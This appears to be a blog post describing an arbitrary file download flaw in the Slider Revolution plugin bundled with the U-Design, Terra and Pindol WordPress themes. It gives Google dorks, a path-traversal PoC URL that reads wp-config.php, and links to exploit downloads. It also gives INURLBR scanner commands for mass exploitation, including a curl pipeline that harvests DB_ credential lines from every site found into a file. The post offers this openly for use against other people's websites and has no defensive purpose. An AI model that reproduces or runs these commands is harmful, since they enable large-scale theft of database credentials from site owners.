Exploring Wordpress Theme Arbitrary File Download Vulnerability Exploits Available

Exploring Wordpress Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification

-------------------------------------------------------------------------------------------
Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143
-------------------------------------------------------------------------------------------
Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------
Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------

All three themes bundle the same vulnerable Slider Revolution (revslider) plugin, so a single request tests all of them: the plugin's revslider_show_image AJAX action reads the file named by the img parameter without stripping ../ sequences, so it can be pointed at wp-config.php, the file that holds the site's database credentials.

POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

The exploit we developed checks about 20 themes, and every one of them is tested with the same request:

POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
which is the same PoC as the 0day entries listed above.

[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Download the exploit and save it as exploit.php; the commands below use that name.

Now let's use the INURLBR scanner to run the exploit against many targets at once (mass exploitation).
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR

INURLBR command syntax:
Ex: php inurlbr.php --dork '<your dork>' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

-q 1,6 selects which search engines are queried, -s names the file the results are saved to, and --comand-all runs the verification exploit against every URL found. The command string is quoted so the shell hands it to INURLBR as a single argument.

php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

Brief introduction to --comand-vul / --comand-all
 --comand-vul Every vulnerable URL found will execute this command.
     Example: --comand-vul {command}
     Usage:   --comand-vul 'nmap -sV -p 22,80,21 _TARGET_'
              --comand-vul './exploit.sh _TARGET_ output.txt'
 --comand-all Use this option to run a single command for EVERY URL found, vulnerable or not.
     Example: --comand-all {command}
     Usage:   --comand-all 'nmap -sV -p 22,80,21 _TARGET_'
              --comand-all './exploit.sh _TARGET_ output.txt'
    Observation:
    _TARGET_ is replaced by the URL/target found; if no GET string was supplied,
    only the domain is substituted.
    _TARGETFULL_ is replaced by the original, complete URL found.
    Quote the command so that the shell does not split it or interpret ; and >> itself.

-------------------------------------------------------------------------------------------
INURLBR ADVANCED CONTROL
Here --exploit-get injects the PoC path into every URL found so the scanner requests it itself, --exploit-comand defines the _EXPLOIT_ macro used by --comand-all, and the --comand-all pipeline records each target, fetches the PoC URL and greps the response for the DB_ defines of wp-config.php (a hit means the file was disclosed; the second curl only repeats the hits on the terminal). The whole command string is quoted so the ; and >> reach INURLBR instead of the shell:

php inurlbr.php --dork '<your dork> revslider' -q 1,6 -s wordpress2.txt \
  --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 \
  --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' \
  --comand-all 'echo "_TARGET__EXPLOIT_" >> curlwordpress.txt; curl -s "_TARGET__EXPLOIT_" | grep "DB_" >> curlwordpress.txt; curl -s "_TARGET__EXPLOIT_" | grep "DB_"'
 
 

Tutorials with video:

[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR
[TUTORIAL] - Hacking Panel Wordpress - Slider Revolution
[TUTORIAL] - Getting access to the Wordpress panel